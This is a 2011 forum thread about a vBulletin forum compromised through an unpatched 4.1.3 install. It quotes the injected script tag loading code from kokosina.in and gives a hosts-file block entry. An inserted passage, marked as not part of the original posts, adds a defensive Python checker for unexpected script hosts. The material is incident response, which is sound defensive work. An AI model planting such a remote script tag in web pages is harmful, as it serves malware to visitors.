Site hacked?


Murmandamus
23-12-2011, 04:22 PM
Visited the homepage, and got a series of redirects through a bunch of sites without me doing anything, and I discovered a very suspicious script in the html for the home page:

<script type="text/javascript" src="http :// kokosina.in/1"></script>

It's near the bottom. It is obfuscated, so likely malicious. Checking my system out now to see if I received an unwelcome drive-by install.

Stoney
23-12-2011, 04:40 PM
I'm getting a warning from Chrome about PGD having some malicious code every now and again.

Murmandamus
23-12-2011, 05:54 PM
https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This

Just noticed that PGD is still running the highly exploitable 4.1.3 version of VB.

You guys have GOT to keep this thing updated, or people are going to get infected all the time.

czar
23-12-2011, 05:56 PM
avast always comes up with a warning when I open pgd

kokosina.in/1

Murmandamus
23-12-2011, 06:11 PM
Yep, that's it. Read the thread on the vbulletin.com site I posted above; it's a widespread problem, and it can be a very nasty infection for users if they don't have updated software/AV.

Murmandamus
23-12-2011, 06:41 PM
Well, no malicious stuff installed on my system, but it's just a matter of time with that injection hole sitting there.

Murmandamus
23-12-2011, 06:58 PM
I'll be in the chat room if anyone needs more info. Not going to keep refreshing the page here since I have to do so with AV off.

WILL
23-12-2011, 07:57 PM
We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.

Hopefully such attacks will become less likely once we've moved to a much more secure host.

dazappa
23-12-2011, 08:18 PM
> We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.
>
> Hopefully such attacks will become less likely once we've moved to a much more secure host.

Only if your host is the one taking care of forum software updates, lol.

Murmandamus
23-12-2011, 10:43 PM
WILL, you REALLY need to fix this ASAP. Your site is attacking your users *right now*. It's not a cosmetic issue; there's a malicious piece of code that your site is serving to your users every time they load the page. That forum thread on vBulletin.com tells you how to fix it.

If it were me, I would shut down the board until it is fixed.

Murmandamus
24-12-2011, 08:13 AM
Just FYI, I would suggest to everyone to blackhole the kokosina.in domain if you continue using this forum until it is fixed. Add the following line to your hosts file in the C:\windows\system32\drivers\etc directory:

127.0.0.1 kokosina.in

Note that this doesn't make browsing the site more secure, it just addresses the current hack. They can change it at any time to point somewhere else. You continue using the forum at your own risk.
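
Added example, not part of the original posts: a hosts-file entry blocks only the one domain seen so far, so a site owner checking rendered pages for this kind of injection is better served by an allowlist of expected script hosts than by a blocklist. The sketch below flags any external `<script src>` host that is not expected; the site host `forum.example`, the allowlist and the sample page are constructed assumptions, with only the last tag mirroring the one reported in this thread.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts this site legitimately loads scripts from (hypothetical).
ALLOWED_SCRIPT_HOSTS = {"cdn.example"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def unexpected_script_hosts(html, page_host, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return the sorted hosts of external scripts that are not allowlisted."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged = set()
    for src in parser.sources:
        # hostname is None for relative URLs and is set for both
        # absolute (http://host/..) and protocol-relative (//host/..) ones.
        host = urlsplit(src).hostname
        if host is None:
            continue  # relative path, served by the site itself
        if host != page_host and host not in allowed:
            flagged.add(host)
    return sorted(flagged)


# Constructed sample page; the last tag mirrors the one reported in the thread.
SAMPLE_PAGE = """
<html><body>
<script type="text/javascript" src="/js/forum.js"></script>
<script type="text/javascript" src="https://cdn.example/lib.js"></script>
<script type="text/javascript" src="http://kokosina.in/1"></script>
</body></html>
"""

if __name__ == "__main__":
    print(unexpected_script_hosts(SAMPLE_PAGE, "forum.example"))
```

Inline scripts without a `src` attribute are not inspected here, so this check covers only the remote-script form of injection described in the thread.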

Legolas
24-12-2011, 08:41 AM
That, or use Firefox and NoScript extension :)

Murmandamus
24-12-2011, 04:53 PM
Yep. That will work, too, for those who use Firefox, anyway. :)

WILL
24-12-2011, 05:00 PM
I'm looking into the fix now. If all goes well it'll be back up and working at least by tomorrow.

WILL
24-12-2011, 08:28 PM
Well that wasn't so bad. And it looks like they made a few improvements in the upgrade from 4.1.3 to 4.1.9. Also I've gone and added reCAPTCHA to the registration system to help prevent bots from spamming us so much. I really do hope that helps.

Anyhow enjoy your attack-free site! ;)

BTW if I missed something (refresh the site cache to make sure!!!) please let me know. I know this sucks for Windows users as you get all kinds of crap sent to attack your systems and do nasty things to it so I will be looking closely at this over the next few days or so. Also I've asked AthenaOfDelphi to add the attacking script to be blocked via htaccess as well just to be sure.

code_glitch
25-12-2011, 12:31 PM
You guys - I hate to re-mention this but you could just move over to Linux :) it might not be entirely net attack proof but at least you can rest easy knowing that no virus or Windows virus based attacks would work. Combine that with Firefox and NoScript as well as noflash and adblock and you're pretty much golden.

LP
25-12-2011, 04:32 PM
> You guys - I hate to re-mention this but you could just move over to linux :)

You can also downgrade your Windows to version 3.1, where no modern virus will work or even better, shut down your computer entirely, after which you won't be vulnerable to any kind of computer attacks. ;)

Seriously though, this is why for Afterwarp site we have moved away from vBulletin, for more than a year they did nothing to fight spam (PGD uses same techniques we've been using in vBulletin 3 for years), made their prices ridiculously high and even though you own a permanent license they constantly nag you to renew, sometimes with death letters. Now this vulnerability has shown that vBulletin is poorly designed so that it technically allows these types of hacks. I would never use vBulletin again. :(

code_glitch
25-12-2011, 04:41 PM
The irony behind vBulletin:

Server running free software, for the free and open source community running on free and open standards on PHP, the technology powering the freedom of the modern web...

Murmandamus
25-12-2011, 04:48 PM
Thanks, Will, I appreciate it very much. :)

As for switching to Linux.. I would if they could ever decide on a desktop UI standard that actually didn't suck. Same with a Windows environment where I could still run the 90%+ of software that I need for work. Also if they could get more hardware manufacturers to write drivers for most of the hardware I use, rather than not being able to use it.

Don't get me wrong, I use and support Linux on my webservers to do the heavy-lifting on the 'net, but the day-to-day user experience just sucks sweaty donkey balls. It IS a lot better than it was, and it is getting better over time, but it's still not there to the point I need it to be in order to switch.